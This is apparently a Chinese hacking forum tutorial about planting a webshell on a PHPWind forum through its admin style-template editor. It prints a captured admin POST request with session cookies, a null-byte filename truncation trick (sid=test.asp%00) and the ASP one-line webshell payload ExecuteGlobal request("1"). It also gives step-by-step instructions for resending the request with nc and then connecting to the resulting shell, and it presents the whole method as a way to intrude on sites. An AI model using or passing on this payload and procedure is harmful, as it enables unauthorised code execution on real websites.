事發(fā)一星期前,在入侵一個PHPWIND論壇時的成果,適用于PHPWIND不能上傳,而網(wǎng)上盛傳的三種拿SEHLL方法都無效,可以一試,應(yīng)該算是PHPWIND后臺的漏洞
準(zhǔn)備工具:winsock專家 v0.6 betan1 一只;UE-32.EXE一只；NC.EXE一只,電腦一臺(只見一堆磚頭飛過。。。。)

開工了，首先打開winsock 然后啟動IE，進入后臺，（哪個又在丟磚頭。。。）

進入風(fēng)格插件>>>>風(fēng)格模板>>>>添加風(fēng)格.在第一項，此風(fēng)格在image目錄下的文件夾名稱:填TEST或FUCKCNN。。然后按提交。

然后點 [返 回 繼 續(xù) 操 作] 找到剛才新建的風(fēng)格，點編緝，
這里就要輪到winsock出場了...
打開IE進程抓包隨便改點什么,如下面的98%改成97%.這里關(guān)鍵的是把數(shù)據(jù)包抓下來,其它的沒所謂

一共二條數(shù)據(jù)如下:
1:
POST /phpwind/upload/admin.php?adminjob=setstyles&verify=bb457aae& HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://x22222.h21.ttrr.com/phpwi ... n=edit&sid=test
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)
Host: x22222.h21.ttrr.com
Content-Length: 473
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 9f9e2_lastpos=T3; 9f9e2_ol_offset=97; 9f9e2_threadlog=%2C2%2C; 9f9e2_winduser=C20FAgIEVABSV1RYUAQDVwICDVcAA1MDVwcGBwEFUgUABGg%3D; 9f9e2_ck_info=%2F%09; 9f9e2_lastvisit=7102%091208851845%09%2Fphpwind%2Fupload%2Fread.php%3Ftid%3D3; 9f9e2_ipfrom=32f09dc105198e55683b704b0f8fbc6b%09%B9%E3%B6%AB%CA%A1%0D; 9f9e2_readlog=%2C1%2C2%2C3%2C; 9f9e2_adskin=0; 9f9e2_cknum=CFZUCggDVABSDDtoA1ZRB1VTCQVUCgJVUwMGAQpXBgdcB1FWWwUHAgFWVlA%3D; 9f9e2_AdminUser=CFZUCggAXQVVBDsAVV4MWmgHWF0BBlUPUAZTDQZTBlIAVlcDXFIGVFNWAVFQUFADBTo%3D

2:
action=edit&step=3&sid=test&setting%5B0%5D=test&setting%5B1%5D=wind&setting%5B2%5D=1&setting%5B7%5D=97%25&setting%5B8%5D=98%25&setting%5B3%5D=%23fff&setting%5B4%5D=%232f5fa1&setting%5B5%5D=%23B6D9E3&setting%5B6%5D=%23D4EFF7&setting%5B9%5D=%2376BAC2&setting%5B10%5D=%2376BAC2&setting%5B11%5D=%23005681&setting%5B12%5D=%235495A0&setting%5B13%5D=%23F7F7F7&setting%5B14%5D=%23D6E8CB&setting%5B15%5D=%23659b28&setting%5B16%5D=%23ffffff&setting%5B17%5D=%23F4FBFF&setting%5B18%5D=
分別把他們存為a.txt和b.txt

重點到了,我們打開b.txt,把第三個參數(shù)sid=test改為test.aspa,在最后的參數(shù)改為setting%5B18%5D=%0D%0C%3C%25ExecuteGlobal+request%28%221%22%29%25%3E簡化點就是[回車符]<%ExecuteGlobal request("1")%>

存盤,可以了,然后查看一下b.txt的大小530字節(jié).套套是給他作好了,再給他帶上看看,

好,現(xiàn)在我們把b.txt的內(nèi)容復(fù)制到a.txt的最下面,再用ue-32打開a.txt,把下面這行Content-Length: 473改成Content-Length: 530,然后切換[到十六進制模式]把剛才修改的第三個參數(shù)sid=test.aspa改為sid=test.asp ,注意,這個 為十六進制的00 .存盤,

用NC.EXE發(fā)送

OK,現(xiàn)在讓我們上FTP看看有沒有生成TEST.ASP(當(dāng)然,如果是入侵的話就直接用一句話客戶端去連拉)

要記得你生成的文件在bbs.xxxxxxxxx.com/data/style/test.asp

總結(jié):漏洞產(chǎn)生的原因是跟很久以前的動網(wǎng)上傳漏洞一樣,沒有考濾00這個字節(jié),當(dāng)我們把生成文件參數(shù)后面加上00時,phpwind就以為程序結(jié)束,然后就會直接生成我們想要的asp.有很多人問,能不能直接生成PHP呢,這個我也一直在試,但都是沒有辦法,因為PHP會把我們輸入的一句話包含到單引號里面,這樣我們的一句話就不能執(zhí)行了,而ASP單引號不影響我們的執(zhí)行,由于本人不懂PHP.所以不知道有沒有其它的辦法,希望本文丟(拋字怎么打也打不出來)磚引玉.讓高手來解決這個問題

最新評論